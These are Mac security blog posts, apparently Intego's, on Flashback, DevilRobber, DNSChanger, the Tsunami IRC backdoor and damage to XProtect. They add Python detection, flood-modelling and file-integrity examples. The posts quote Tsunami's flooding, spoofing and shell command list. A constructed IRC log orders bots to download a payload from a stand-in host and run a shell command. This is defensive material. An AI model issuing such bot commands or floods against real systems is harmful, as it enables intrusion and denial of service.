Apple has recently updated its Xprotect file quarantine system, which checks files downloaded by certain programs – notably Safari, Mail and iChat – for malware, but Intego has spotted a new variant of the Flashback Trojan horse, called OSX/FlashBack.J. This variant was released after Apple’s update, and Xprotect does not recognize it yet.

VirusBarrier X6’s generic signatures already detected this new variant, and will probably detect many future variants as well.
Intego’s malware researchers have found a new variant of the DevilRobber Trojan horse, which they first discovered in October. The latest variant – DevilRobber.D (there have been two others in between) – has been spotted in three Mac applications distributed via BitTorrent trackers. The applications in question are Writer’s Café, EvoCam and Twitterrific.
It is important to note that the original applications, obtained from the developers’ web sites, are not infected, but that malicious users distribute infected versions via BitTorrent trackers. If you use these applications, and have purchased them from the developers, you have nothing to worry about.
In the meantime, VirusBarrier X6 protects against this Trojan horse. Intego updated its malware definitions to recognize this malware, but the existing malware definitions, for previous variants, already blocked it.
As Americans enjoy their long Thanksgiving weekend, malware writers are thankful for only one thing: more and more Mac users are getting tricked into installing their wares. The Flashback Trojan horse, which we first reported on here, then followed with a new variant, then another, has bred several more variants. Intego has spotted several new versions of this malware which, while not changing the malware’s features, have changed its code in an attempt to sneak past malware protection such as that of VirusBarrier X6.
The bogus alerts you see on sites serving this malware haven’t changed:

But the effect is the same. When you end up on a site like this, an installation package is automatically downloaded, and, if your browser settings allow it, launched so you’ll see an Installer window.
As we said in a previous article, if you see a web page similar to that shown above, do not run any installer, and if the Installer window does not open, check your Downloads folder for any package file that contains the name Flash, then delete it. Only download Flash Player installers from the Adobe web site.
Operation Ghost Click: this sounds like something out of 24. But it’s a two-year FBI investigation that brought down “a sophisticated Internet fraud ring that infected millions of computers worldwide with a virus and enabled the thieves to manipulate the multi-billion-dollar Internet advertising industry.”
These cyber-criminals used the malware to do what is called “click fraud.” When you click on an ad or an advertising link on a web page, you expect to go to the web site that’s advertising. Under these schemes, using malware that changed the DNS (domain name server) settings on infected computers, you would instead be taken to a different computer, where you might go to a bogus web site, and potentially purchase something you thought was from a legitimate retailer; or be taken to web sites that earn money by displaying ads, often ads for pornographic web sites.
The FBI estimates that “more than four million computers in over 100 countries — including an estimated 500,000 PCs in the United States” were infected by this malware, which belongs to the DNSChanger family. This includes the RSPlug Trojan horse, which Intego discovered on October 31, 2007, and which spawned a number of variants and infected many Macs. (It should be noted that those behind the RSPlug Trojan horse stopped their activities before those controlling the Windows malware did. It’s likely that these were not the same people.)
We’ve often pointed out that the people behind today’s malware are out to make money. That’s why they attacked Macs with fake antivirus software, and that’s why they attacked Macs with the RSPlug Trojan horse, among others. This FBI takedown is important, in that it shows that the FBI was able to work closely with security researchers and law enforcement agencies around the world to pinpoint the command and control servers that were behind this scheme. Security journalist Brian Krebs gives more info on exactly how this happened.
So stay safe. Don’t download software from untrusted web sites, and protect your Mac with anti-malware software, just in case. It’s easy to get infected, and if you’re not protected, it’s hard to know if your Mac is compromised.
A new backdoor and hacker tool, Tsunami, has been discovered. This hacker tool seems to be a port of Linux malware that has been around for some time; it provides remote access to hackers by listening on an IRC (Internet Relay Chat) channel for instructions.
Tools like this are often used for distributed denial of service (DDoS) attacks (more on that below). These attacks flood computers with standard network requests, with a goal of overloading them. If a server receives more requests than it can handle, it can slow down, or even crash.
The Tsunami backdoor accepts a number of commands; it can change servers, download files such as updates, and send packets to a specified IP address. Its built-in help text lists the following:

TSUNAMI <target> <secs> = A PUSH+ACK flooder
PAN <target> <port> <secs> = A SYN flooder
UDP <target> <port> <secs> = An UDP flooder
UNKNOWN <target> <secs> = Another non-spoof udp flooder
NICK <nick> = Changes the nick of the client
SERVER <server> = Changes servers
GETSPOOFS = Gets the current spoofing
SPOOFS <subnet> = Changes spoofing to a subnet
DISABLE = Disables all packeting from this bot
ENABLE = Enables all packeting from this bot
KILL = Kills the knight
GET <http address> <save as> = Downloads a file off the web
VERSION = Requests version of knight
KILLALL = Kills all current packeting
HELP = Displays this
IRC <command> = Sends this command to the server
SH <command> = Executes a command
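The command vocabulary above is also what a defender can key on. As an added example, not Intego’s code and not taken from the backdoor’s own source, the following Python script scans captured IRC channel traffic for that vocabulary and classifies each hit, the way a network sensor or an incident responder might confirm that a host is taking orders from a Tsunami controller. The IRC log lines are constructed, and the rule that a command is recognized by the first word of a PRIVMSG body is an assumption; the real bot may require an addressing prefix.

```python
"""Spot Tsunami-style bot commands in captured IRC traffic.

Added example, not Intego's code. The command vocabulary comes from the help
text quoted in the article; the log lines are constructed, and the rule that a
command is recognised by the first word of a PRIVMSG body is an assumption.
"""
import re
from collections import Counter

# verb -> (argument names from the help text, category used for triage)
TSUNAMI_COMMANDS = {
    "TSUNAMI":   (["target", "secs"], "flood"),
    "PAN":       (["target", "port", "secs"], "flood"),
    "UDP":       (["target", "port", "secs"], "flood"),
    "UNKNOWN":   (["target", "secs"], "flood"),
    "NICK":      (["nick"], "control"),
    "SERVER":    (["server"], "control"),
    "GETSPOOFS": ([], "control"),
    "SPOOFS":    (["subnet"], "control"),
    "DISABLE":   ([], "control"),
    "ENABLE":    ([], "control"),
    "KILL":      ([], "control"),
    "GET":       (["url", "save_as"], "download"),
    "VERSION":   ([], "control"),
    "KILLALL":   ([], "control"),
    "HELP":      ([], "control"),
    "IRC":       (["command"], "control"),
    "SH":        (["command"], "exec"),
}
REST_OF_LINE = {"IRC", "SH"}          # the one argument is the remainder of the message
HIGH_SEVERITY = {"flood", "download", "exec"}

# ":nick!user@host PRIVMSG #chan :text"  (the "!user@host" part is optional)
PRIVMSG_RE = re.compile(
    r"^:(?P<sender>[^!\s]+)(?:!\S*)?\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)


def parse_command(text):
    """Return (verb, {arg: value}) if text is a well-formed bot command, else None.

    Arity is strict: ordinary chat that happens to start with a zero-argument verb
    ("version 2 of that tool is out") is rejected, which keeps false positives down.
    """
    tokens = text.strip().split()
    if not tokens:
        return None
    verb = tokens[0].upper()
    if verb not in TSUNAMI_COMMANDS:
        return None
    names, _category = TSUNAMI_COMMANDS[verb]
    if verb in REST_OF_LINE:
        values = [" ".join(tokens[1:])] if len(tokens) > 1 else []
    else:
        values = tokens[1:]
    if len(values) != len(names):
        return None
    return verb, dict(zip(names, values))


def scan_irc_log(lines):
    """Scan IRC log lines; return one finding per recognised bot command."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = PRIVMSG_RE.match(line.strip())
        if not m:
            continue
        parsed = parse_command(m.group("text"))
        if parsed is None:
            continue
        verb, args = parsed
        category = TSUNAMI_COMMANDS[verb][1]
        findings.append({
            "line": lineno,
            "sender": m.group("sender"),
            "channel": m.group("target"),
            "command": verb,
            "category": category,
            "args": args,
            "severity": "high" if category in HIGH_SEVERITY else "medium",
        })
    return findings


def summarize(findings):
    """Count findings per category, for a quick triage view."""
    return Counter(f["category"] for f in findings)


# Constructed sample log (not real traffic): a controller driving bots in #bots,
# plus two ordinary chat lines and one malformed command.
SAMPLE_LOG = [
    ":operator!op@198.51.100.7 PRIVMSG #bots :HELP",
    ":operator!op@198.51.100.7 PRIVMSG #bots :SPOOFS 203.0.113",
    ":operator!op@198.51.100.7 PRIVMSG #bots :TSUNAMI 192.0.2.10 60",
    ":operator!op@198.51.100.7 PRIVMSG #bots :PAN 192.0.2.10 80 120",
    ":operator!op@198.51.100.7 PRIVMSG #bots :GET http://example.invalid/upd.bin /tmp/.upd",
    ":operator!op@198.51.100.7 PRIVMSG #bots :SH uname -a",
    ":alice!a@192.0.2.99 PRIVMSG #bots :anyone seen the new flash update?",
    ":operator!op@198.51.100.7 PRIVMSG #bots :TSUNAMI 192.0.2.10",
    ":bob!b@192.0.2.5 PRIVMSG alice :version 2 of that tool is out",
]

if __name__ == "__main__":
    hits = scan_irc_log(SAMPLE_LOG)
    for h in hits:
        print(f"line {h['line']}: {h['severity']:<6} {h['category']:<8} {h['command']} {h['args']} from {h['sender']}")
    print("summary:", dict(summarize(hits)))
```

Strict arity is a deliberate choice: the bot’s zero-argument verbs (HELP, VERSION, KILL) are ordinary English words, so a looser match would flag normal conversation. The severity field separates the commands that cause outward harm or change the host (flooders, file download, shell execution) from housekeeping such as nick or server changes.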
Source code for this backdoor has been publicly available since at least September 2009, and it is trivial to compile this code, using Apple’s Xcode, and create a Mac executable.
This tool requires installation, and may actually be installed manually by people who choose to participate in DDoS attacks, such as those in the Anonymous group.
Individual users generally have little to fear from these tools. However, servers connected to the Internet can be vulnerable to remote installation. Hackers can take advantage of weaknesses in server tools, or especially PHP vulnerabilities, to gain access to a server and install a tool like this. In addition, once such a tool has been installed, the remote hacker can install other software onto the infected Mac.
A denial of service attack, or a distributed denial of service attack (DDoS), occurs when one or many computers “gang up” on a web site or server by sending a flood of traffic to that server. Most web servers can handle standard traffic of a certain number of connection attempts per second. Large web sites, such as the biggest online retailers, can handle thousands of connections a second or more. But when thousands of computers get together and send requests all at the same time, sending “floods” of requests, servers have trouble remaining operable. When this type of attack happens, most firewalls will act and block the sending address, but in sophisticated attacks, these addresses are forged, and may change with each new packet.
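The last sentence above is the crux of why distributed and spoofed floods are hard to stop at the firewall. As an added example (not from the article), this Python snippet models the two kinds of counter a defender can keep: one per source address, which is what an auto-blocking firewall uses, and one aggregate counter for all traffic. Both floods fed through it are constructed; the per-source block stops a single real attacker quickly, but when every packet carries a different forged address the per-source counters never reach the threshold and only the aggregate view reveals the flood.

```python
"""Why per-address blocking fails against a spoofed flood.

Added example, not Intego's code. A small sliding-window monitor keeps one
counter per source address (what a firewall's auto-block does) and one counter
for all traffic combined; the two connection floods below are constructed.
"""
from collections import defaultdict, deque


class FloodMonitor:
    """Sliding-window connection counters: per source address, and aggregate."""

    def __init__(self, window_secs=1.0, per_source_limit=100, aggregate_limit=300):
        self.window = window_secs
        self.per_source_limit = per_source_limit
        self.aggregate_limit = aggregate_limit
        self._per_source = defaultdict(deque)   # src -> timestamps inside the window
        self._all = deque()                      # timestamps of every attempt inside the window
        self.blocked = set()                     # addresses the "firewall" now drops
        self.aggregate_alerts = 0

    def _trim(self, dq, now):
        # Drop timestamps that have fallen out of the window.
        while dq and now - dq[0] > self.window:
            dq.popleft()

    def observe(self, ts, src):
        """Record one connection attempt at time ts from src; return events fired."""
        if src in self.blocked:
            return ["dropped"]                   # already blocked: never reaches the server
        events = []
        dq = self._per_source[src]
        dq.append(ts)
        self._trim(dq, ts)
        if len(dq) > self.per_source_limit:
            self.blocked.add(src)
            events.append("block_source")
        self._all.append(ts)
        self._trim(self._all, ts)
        if len(self._all) > self.aggregate_limit:
            self.aggregate_alerts += 1
            events.append("aggregate_alert")
        return events

    def tracked_sources(self):
        """Distinct source addresses holding state. A spoofed flood makes this grow
        without bound, which is itself a resource problem for the defender."""
        return len(self._per_source)


def run(records, **limits):
    """Feed (timestamp, source) records through a fresh monitor and report the outcome."""
    mon = FloodMonitor(**limits)
    for ts, src in records:
        mon.observe(ts, src)
    return {
        "blocked": set(mon.blocked),
        "aggregate_alerts": mon.aggregate_alerts,
        "distinct_sources": mon.tracked_sources(),
    }


def single_source_flood(n=600, src="203.0.113.5"):
    """Constructed: n attempts spread over one second from one real address."""
    return [(i / n, src) for i in range(n)]


def spoofed_flood(n=600):
    """Constructed: n attempts over one second, every one from a different forged address."""
    return [(i / n, f"10.0.{i // 256}.{i % 256}") for i in range(n)]


if __name__ == "__main__":
    print("single source:", run(single_source_flood()))
    print("spoofed sources:", run(spoofed_flood()))
```

With the defaults, the single-source run blocks 203.0.113.5 after 101 attempts and the aggregate counter never trips because the rest of the flood is dropped at the edge. The spoofed run blocks nothing, tracks 600 “sources”, and raises the aggregate alert on every attempt past the 300th; in practice that aggregate signal is what feeds upstream rate limiting or scrubbing, since there is no single address to block.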
Denial of service attacks are illegal; they are done for malicious purposes, such as to prevent a web site from functioning, or to block network traffic to and from a specific server. In some cases, such as Operation Payback, denial of service attacks were launched by a company paid by some Bollywood movie studios to attack websites that would not take down copyrighted material. After this, a retaliatory attack was made against a number of copyright organizations, law firms and others. Another attack was made on financial organizations that refused to process donations to Wikileaks.
Some users may install the Tsunami backdoor intentionally, to be part of such attacks. It is also possible that this tool is installed remotely on servers to increase the number of computers participating in such attacks, and, therefore, their effectiveness.
Tsunami is one of the many dozens of hacker tools that Intego VirusBarrier X6 protects against. These are tools that are used to attack a machine other than the one on which it is installed, and include tools for executing DDoS attacks, scanning ports, sniffing network traffic, searching for known vulnerabilities and much more.
Most hacker tools are in limited circulation, and are not used for direct attacks; they need to be manually installed on computers, after which they are operated remotely. As such, their threat level is generally very low. Nevertheless, VirusBarrier X6 protects against all such tools, notably to protect servers where they may be installed via exploits that take advantage of vulnerabilities in third-party code, such as PHP.
In any case, Intego has updated the threat filters for VirusBarrier X6 to protect against this backdoor; threat filters dated October 25, 2011 or later, will spot and block this malware as OSX/Tsunami.A.
A security firm has published some information on a new variant of the Flashback Trojan horse, which Intego discovered in September. This new variant, which they are calling Flashback.C, is the variant that Intego spotted a week ago, Flashback.D. (It’s not uncommon for different security companies to name variants differently; we may have more variants than other companies.)
Some of the information published about this variant is interesting, notably the fact that it can disable Apple’s Xprotect malware detection system. When disabling the Xprotect system, the Trojan horse overwrites certain files (notably the info.plist file for the XProtectUpdater daemon, which prevents Mac OS X from getting updates to this file), which means that VirusBarrier X6 cannot repair the damage. (In order to repair it, VirusBarrier X6 would need to re-install a new version of the file; the program cannot simply erase changes made, since the file is overwritten entirely.)
Some companies have published instructions for manually removing this malware, but it is important to note that such instructions only discuss removing code added to the Safari or Firefox web browsers; given the damage done to the XProtect system, manual repair is impossible. (It is technically possible to recover the XProtect file from a backup, if a user has cloned their startup volume, such as with Intego Personal Backup, which is part of Internet Security Barrier, or made a full system backup with Apple’s Time Machine; this entails restoring the /usr/libexec/XProtectUpdater daemon. Users should be very careful if they do this manually, as opposed to using the restoration function of Personal Backup or Time Machine, as permissions on the file could cause the daemon to not function correctly.)
This is the first malware affecting Mac OS X that we have seen that intentionally damages system files. Because of this, repairing damage can be very time-consuming. Even with the appropriate, up-to-date backups, it still takes time to restore the operating system. In the Windows world, the most common method for dealing with this type of file corruption is to re-install the entire operating system. We hope Mac malware doesn’t use similar techniques in the future that would require a full installation of Mac OS X to repair damage. Of course, it is wise to protect one’s Mac with antivirus software to ensure that such damage doesn’t occur in the first place.
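The repair problem described above has two distinct failure modes: a file whose contents were overwritten, which can only come back from a backup, and a file copied back by hand with the wrong permissions, which the previous paragraph warns can stop the daemon from running. As an added example, not Intego’s or Apple’s code, the Python script below implements a baseline-and-verify check that tells the two apart by recording a SHA-256 hash together with mode and ownership for each watched file. The watch list holds only the daemon path the article names; the walk-through runs on a constructed stand-in file in a temporary directory rather than on the real system file.

```python
"""Baseline-and-verify check for system files that malware overwrites.

Added example, not Intego's or Apple's code. WATCHED_PATHS holds the daemon
named in the article; the demo uses a constructed stand-in in a temp directory.
"""
import hashlib
import os
import stat
import tempfile

# The Info.plist the article also mentions is not given a full path on the page,
# so only the daemon binary is listed here; add the plist path from your own system.
WATCHED_PATHS = ["/usr/libexec/XProtectUpdater"]


def describe(path):
    """SHA-256 plus mode, uid and gid of one file, or None if it does not exist."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return {
        "sha256": digest.hexdigest(),
        "mode": stat.S_IMODE(st.st_mode),
        "uid": st.st_uid,
        "gid": st.st_gid,
    }


def snapshot(paths):
    """Record the known-good state of each path (run this on a clean system)."""
    return {p: describe(p) for p in paths}


def verify(paths, baseline):
    """Compare the current state of each path with the baseline and classify it."""
    report = {}
    for p in paths:
        then = baseline.get(p)
        now = describe(p)
        if then is None:
            report[p] = "not in baseline"
        elif now is None:
            report[p] = "missing"
        elif now["sha256"] != then["sha256"]:
            # Overwritten in place: nothing to "undo", the file has to come back from a backup.
            report[p] = "content changed"
        elif (now["mode"], now["uid"], now["gid"]) != (then["mode"], then["uid"], then["gid"]):
            # Right bytes, wrong permissions: typical of a manual copy, and the daemon may not run.
            report[p] = "permissions changed"
        else:
            report[p] = "ok"
    return report


def demo():
    """Overwrite, careless manual restore, proper restore, on a constructed stand-in file."""
    results = []
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "XProtectUpdater")
        original = b"#!/bin/sh\n# constructed stand-in for the real daemon\n"
        with open(path, "wb") as f:
            f.write(original)
        os.chmod(path, 0o755)
        baseline = snapshot([path])
        results.append(verify([path], baseline)[path])   # clean: "ok"

        with open(path, "wb") as f:                        # malware overwrites the file
            f.write(b"constructed garbage standing in for the overwrite\n")
        results.append(verify([path], baseline)[path])   # "content changed"

        with open(path, "wb") as f:                        # copied back by hand ...
            f.write(original)
        os.chmod(path, 0o600)                              # ... but with the wrong mode
        results.append(verify([path], baseline)[path])   # "permissions changed"

        os.chmod(path, 0o755)                              # mode restored too
        results.append(verify([path], baseline)[path])   # "ok"
    return results


if __name__ == "__main__":
    for step, outcome in zip(["clean", "overwritten", "manual copy", "restored"], demo()):
        print(f"{step:<12} {outcome}")
```

On a real system the baseline would be taken once from a clean installation and stored off-host, and `verify(WATCHED_PATHS, baseline)` run after any suspected infection or manual repair; the check is deliberately content-first, so a file that fails the hash comparison is reported as overwritten even if its permissions also happen to be wrong.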
Since Intego discovered this variant of the Flashback Trojan horse, the command and control servers that the malware contacts have been inoperable. However, now that this Trojan horse is in the news again, these servers have awakened, and Intego has seen activity today, sending updates to installed malware.
Intego VirusBarrier X6, with malware definitions dated October 13, 2011, or later, detects and blocks this malware.